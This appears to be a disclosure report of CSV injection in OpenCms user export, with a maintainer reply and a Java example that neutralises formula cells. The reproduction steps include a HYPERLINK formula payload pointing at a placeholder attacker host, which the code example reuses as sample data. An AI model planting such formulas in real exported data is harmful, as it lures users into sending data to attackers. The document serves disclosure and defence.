I would like to report a vulnerability (CSV Injection) which I have observed in the current version, v10.5.4, and earlier.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524
Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
Exfiltrating contents from the spreadsheet, or other open spreadsheets.
Impacted URL is http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
Steps to reproduce:
Browse to Quick Launch -> Account Management -> User Management -> New User
Insert =HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe") in the First Name and Last Name fields
Now export all user information as CSV using the export feature in the application.
Quick Launch -> Account Management -> User Management -> Export User
Once the user opens the affected CSV file, the payload will be triggered.
I have to correct my last comment: The format has changed, but Excel still behaves the same. Nevertheless, we export CSV - not Excel files, and CSV is valid.
Hello Team,
Please refer to https://www.owasp.org/index.php/CSV_Injection for more details.
Version Details:
Best Regards
https://github.com/varchashva
varchashva [at] gmail [dot] com
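One way to neutralise such values at export time, following the OWASP CSV Injection guidance linked in the report. This is an added example, not OpenCms code: the class and method names are hypothetical and the user rows are constructed.

```java
import java.util.List;
import java.util.stream.Collectors;

/** Added example (not OpenCms code): neutralise formula cells when writing CSV. */
public class CsvExportGuard {

    // Leading characters that spreadsheet programs treat as the start of a
    // formula (the set listed in OWASP's CSV Injection guidance).
    private static final String FORMULA_TRIGGERS = "=+-@\t\r";

    /** Returns one CSV field: formula-neutralised, then RFC 4180 quoted. */
    static String safeField(String value) {
        String v = (value == null) ? "" : value;
        if (!v.isEmpty() && FORMULA_TRIGGERS.indexOf(v.charAt(0)) >= 0) {
            // With a leading apostrophe the cell no longer starts with a
            // trigger character, so the spreadsheet reads it as text.
            v = "'" + v;
        }
        // Always quote and double embedded quotes, so a value cannot break
        // out into a new cell or row and start a formula there.
        return "\"" + v.replace("\"", "\"\"") + "\"";
    }

    /** Joins already-neutralised fields into one CSV line. */
    static String safeRow(List<String> fields) {
        return fields.stream()
                     .map(CsvExportGuard::safeField)
                     .collect(Collectors.joining(","));
    }

    public static void main(String[] args) {
        // Constructed sample records; the first carries the value from the report.
        List<List<String>> users = List.of(
            List.of("jdoe",
                    "=HYPERLINK(\"http://[attacker_ip:port]/GiveMeSomeData\",\"IAmSafe\")",
                    "Doe"),
            List.of("asmith", "Anna", "Smith"),
            List.of("bob", "-2+3", "@SUM(A1:A2)"));

        System.out.println(safeRow(List.of("login", "firstname", "lastname")));
        for (List<String> user : users) {
            System.out.println(safeRow(user));
        }
    }
}
```

The prefix changes the exported value, so an import routine that reads these files back has to strip the leading apostrophe again.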